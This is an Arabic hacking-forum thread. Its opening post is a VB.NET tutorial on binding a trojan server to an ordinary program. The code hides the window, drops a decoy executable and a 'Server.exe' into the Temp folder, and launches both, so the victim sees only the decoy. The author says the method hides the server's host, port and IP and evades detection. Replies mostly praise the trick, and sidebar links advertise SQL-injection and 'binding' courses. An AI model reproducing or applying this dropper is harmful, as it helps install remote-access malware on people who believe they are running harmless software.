1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ دمج ] دمج السيرفر مع أي برنامج بالدوت نت vb

الموضوع في 'حماية الأجهزة' بواسطة لاذكروني الجبوري, بتاريخ ‏3 يونيو 2014.

كاتب الموضوع : لاذكروني الجبوري المشاهدات : 1,315 الردود : 10 ‏3 يونيو 2014
حالة الموضوع:
مغلق
  1. غير متصل

    لاذكروني الجبوري <span style="font-weight: bold; text-shadow: #BBBB
    V • I • P

    عضو منذ:
    ‏27 فبراير 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    الإقامة:

    [​IMG]

    سًلام عليّكم أحًبّائيّ

    أسًفُ عنٌ الغّيّابّ الطٌوِيّل
    بّسًبّبّ المشّاكل

    طٌريّقَة بّسًيّطٌ للدُمجَ بّالدُوِتُ نٌتُ vb

    مع أيّ بّرنٌامجَ النٌاتُجَ كانٌ كليّنٌ
    لاكنٌ بّسًبّبّ الفُحًصِ أنٌكشّفُ

    الطٌريّقَة تُقَوِم بّـ خٌفُاء أعدُادُاتُ السًيّرفُر
    حًسًبّ تُجَربّتُيّ فُأنٌه يّقَوِم بّـ خٌفُاء الهوِسًتُ
    وِالبّوِرتُ وِالايّ بّيّ

    أفتح مشروع جديد
    [​IMG]

    قم بأضافة
    5- Button و 5- TextBox و 5- Timer للتمويه
    وقم بـ أخفاء الأستايل
    [​IMG]

    بالـ Form1_Load أضف الكود التالي

    On Error Resume Next
    Me.ShowInTaskbar = False
    Me.ShowIcon = False
    Me.Visible = True
    Me.Opacity = 0
    Dim mr As String = My.Computer.FileSystem.SpecialDirectories.Temp
    Dim ziko As String = mr + "أسم البرنامج.exe"
    IO.File.WriteAllBytes(ziko, My.Resources.اسم البرنامج)
    Process.Start(ziko)
    Timer1.Start()



    مثل الصورة
    [​IMG]

    وبالـ Timer1 أضف الكود التالي

    Try
    Dim mr As String = My.Computer.FileSystem.SpecialDirectories.Temp
    Dim zaid As String = mr + "Server.exe"
    IO.File.WriteAllBytes(zaid, My.Resources.Server)
    Process.Start(zaid)
    End
    Catch ex As Exception
    End Try
    End Sub



    مثل الصورة
    [​IMG]

    وشكراَ
    أنتضرو المزيد
    &:":
    [​IMG][/CENTER]
     


    1 person likes this.
    جاري تحميل الصفحة...
  2. غير متصل

    Sudan Tiger
    V • I • P

    عضو منذ:
    ‏25 مايو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    22
    نقاط الجائزة:

    رد: دمج السيرفر مع أي برنامج بالدوت نت vb

    وعليكم السلام ورحمة الله ياغالي

    شرح اكثر من رائع

    جاااري الوشم بالخماسي + التقيم

    )5:"
     


  3. غير متصل

    ★ قبعة القش ★
    V • I • P

    عضو منذ:
    ‏10 مايو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:

    رد: دمج السيرفر مع أي برنامج بالدوت نت vb

    مبدع حقا
    تسلم إيدك حبيبي
     


  4. غير متصل

    TeePlow
    V • I • P

    عضو منذ:
    ‏12 مارس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    10
    نقاط الجائزة:

    رد: دمج السيرفر مع أي برنامج بالدوت نت vb

    السلام عليكم
    شرح رائع يا مبدع واصل :{10}::{10}:
     


  5. غير متصل

    خأإآلد
    DeveloPer Plus

    عضو منذ:
    ‏18 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: دمج السيرفر مع أي برنامج بالدوت نت vb

    تِسلَـمْ أخِي :{8}:
    بَاركـَ الله فِيكَ :{1}:
     


  6. غير متصل

    fatima
    rank
    Developer

    عضو منذ:
    ‏28 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: دمج السيرفر مع أي برنامج بالدوت نت vb

    شكرا بس لو كان فيه شرح فيديو يكون احسن عشت اخى ننتظر المزيد من ابداعك واصل&:":
     


  7. غير متصل

    Ameer Eagle V.I.P
    طاقم الإدارة

    عضو منذ:
    ‏7 يونيو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    2,777
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:

    رد: دمج السيرفر مع أي برنامج بالدوت نت vb

    عشت حبي بارك الله بيك على الكرح المميز


     


  8. غير متصل

    Ameer Eagle V.I.P
    طاقم الإدارة

    عضو منذ:
    ‏7 يونيو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    2,777
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:

    رد: دمج السيرفر مع أي برنامج بالدوت نت vb

    مع الاسف حبي جرب
    وطلع لي 12 يرر هههههههههههه

     


  9. غير متصل

    ✶ s c я є α м Developer SpyNote

    عضو منذ:
    ‏23 ديسمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    739
    نقاط الجائزة:
    الإقامة:

    رد: دمج السيرفر مع أي برنامج بالدوت نت vb

    يعطيك العافيه اخوي شي جميل
     


  10. غير متصل

    AHMEDZAIN
    rank
    Developer

    عضو منذ:
    ‏26 ديسمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: دمج السيرفر مع أي برنامج بالدوت نت vb

    يعططيك العافيه اخخوي جاري التججربه :)
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...